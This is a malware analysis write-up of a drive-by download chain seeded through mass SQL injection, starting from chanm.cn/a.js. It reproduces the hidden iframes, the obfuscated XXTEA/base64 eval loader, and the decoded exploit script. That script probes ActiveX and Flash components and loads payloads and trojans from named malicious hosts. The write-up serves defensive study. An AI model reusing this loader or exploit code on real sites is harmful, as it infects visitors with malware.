chanm.cn/a.js

Another domain spread through mass SQL injection has been discovered: the injected pages pull in http://chanm.cn/a.js (live malware infrastructure at the time of writing — do not load it in a browser; fetch it with a non-rendering client if you need a sample).

Besides the 51yes.com counter iframe, a.js embeds the following hidden (0x0) iframe:
<iframe src=http://www.gogo111.net/dl6.htm?Seraph width=0 height=0></iframe>
which in turn embeds another zero-height iframe:
<iframe src=news.html width=100 height=0></iframe>

Content of news.html (the relative src resolves against www.gogo111.net):


<script>window.onerror=function(){return true;}</script>
<script>
/*Extreme*/
window.defaultStatus="Íê³É";
Status="utf8to16";
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function xxtea_decrypt(str,key){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="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";
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0=4(5(3(0),\'\\2\\1\\6\\d\\7\'));c["\\b\\a\\8\\9"](0);',14,14,'t|x75|x66|base64decode|utf8to16|xxtea_decrypt|x63|x31|x61|x6c|x76|x65|window|x6b'.split('|'),0,{}))
/*Extreme*/
</script>

The packed `eval` line unpacks to `t=utf8to16(xxtea_decrypt(base64decode(t),'\x66\x75\x63\x6b\x31'));window["\x65\x76\x61\x6c"](t);` — base64-decode the blob, XXTEA-decrypt it with a five-byte key, UTF-8-decode the result and `eval` it. The decoded payload is:

try{var e;
var ado=(document.createElement("object"));
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/user1.isee080.net\/ms06014.js><\/script>")}
else{
try{var f;
var Flashver = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9");}
catch(f){};
finally{if(f!="[object Error]"){
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain">');
document.write('<param name="movie" value="http://www.guccime.net/4561.swf">');
document.write('<param name="quality" value="high">');
document.write('<param name="bgcolor" value="#ffffff">');
document.write('<embed src="http://www.guccime.net/4561.swf">');
document.write('</object>');
}else{document.write("<EMBED src=http://www.guccime.net/4562.swf width=0 height=0>")}}}
try{var g;
var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.isee080.net/GLWORLD.html"></iframe>')}}
try{var h;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(h){};
finally{if(h!="[object Error]"){
if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user1.isee080.net\/real.js><\/script>')}
else{document.write('<iframe style=display:none src="http://user1.isee080.net/Real.html"></iframe>')}}}
try{var i;
var Baidu=new ActiveXObject("BaiduBar.Tool");}
catch(i){};
finally{if(i!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://user1.isee080.net/Baidu.cab", "Baidu.exe", 0)}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]")
{
try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe width=100 height=0 src=http://user1.isee080.net/Thunder.html></iframe>')}catch(e){}
}}}

The decoded JS shows which client-side components it probes and tries to exploit: MDAC/ADODB.Stream (the ms06014.js stage), Flash 9 (hidden SWFs from guccime.net), GLWorld's GLIEDown control, RealPlayer's IERPCtl (version-gated: ≤ 6.0.14.552 gets real.js, anything else Real.html), BaiduBar.Tool's DloadDS download method, and Thunder's DPClient.Vod.

ms06014.js – downloads a trojan from http://user1.12-26.net/bak.css (served under a .css name), which in turn downloads further trojans from http://softa.softkills.net/soft[0-36].exe (i.e. soft0.exe … soft36.exe).
